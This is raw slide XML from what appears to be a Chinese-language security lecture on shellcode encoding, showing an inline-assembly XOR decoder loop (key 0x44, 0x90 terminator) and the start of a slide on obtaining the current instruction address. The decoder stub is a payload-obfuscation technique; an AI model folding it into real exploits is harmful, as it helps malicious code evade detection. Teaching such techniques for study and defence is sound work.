        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>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解码程序</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的一部分。下面的解码程序中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"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默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"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400" u="sng"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400"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开始时对准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" u="sng"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400"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起始位置</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，程序将每次将</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的代码异或特定</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key</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0x44</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）后重新覆盖原先</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的代码。末尾，放一个空指令</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0x90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作为结束符。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557168" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5950234" y="837929"/>
              <a:ext cx="958281"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异或编码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="822396128"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1748855" y="2536205"/>
          <a:ext cx="9649072" cy="4430078"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="9649072">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>void main()</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__</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>asm</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add </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, 0x14 ;  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>越过</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>decoder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>记录</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>起始地址</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>记录当前</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>开始地址</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r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>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decode_loop</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</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mov</a:t>
                      </a:r>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bl</a:t>
                      </a:r>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eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>+ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>]</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xor</a:t>
                      </a:r>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bl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, 0x44             ;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0x44</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>作为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>key</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mov</a:t>
                      </a:r>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eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>+ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>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bl</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r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>inc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>cmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>bl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, 0x90             </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>末尾放一个</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>作为结束符</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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jne</a:t>
                      </a:r>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decode_loop</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a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"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05823176"/>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00783" y="1096045"/>
            <a:ext cx="10747122" cy="520351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="13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怎么让</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记录</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当前的起始地址？看如下代码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557168" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5325269" y="837929"/>
              <a:ext cx="2208213"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获得代码当前指令地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248948767"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1244799" y="1616396"/>
          <a:ext cx="8562762" cy="5394960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8562762">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>#include &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>iostream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>using namespace </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>std</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
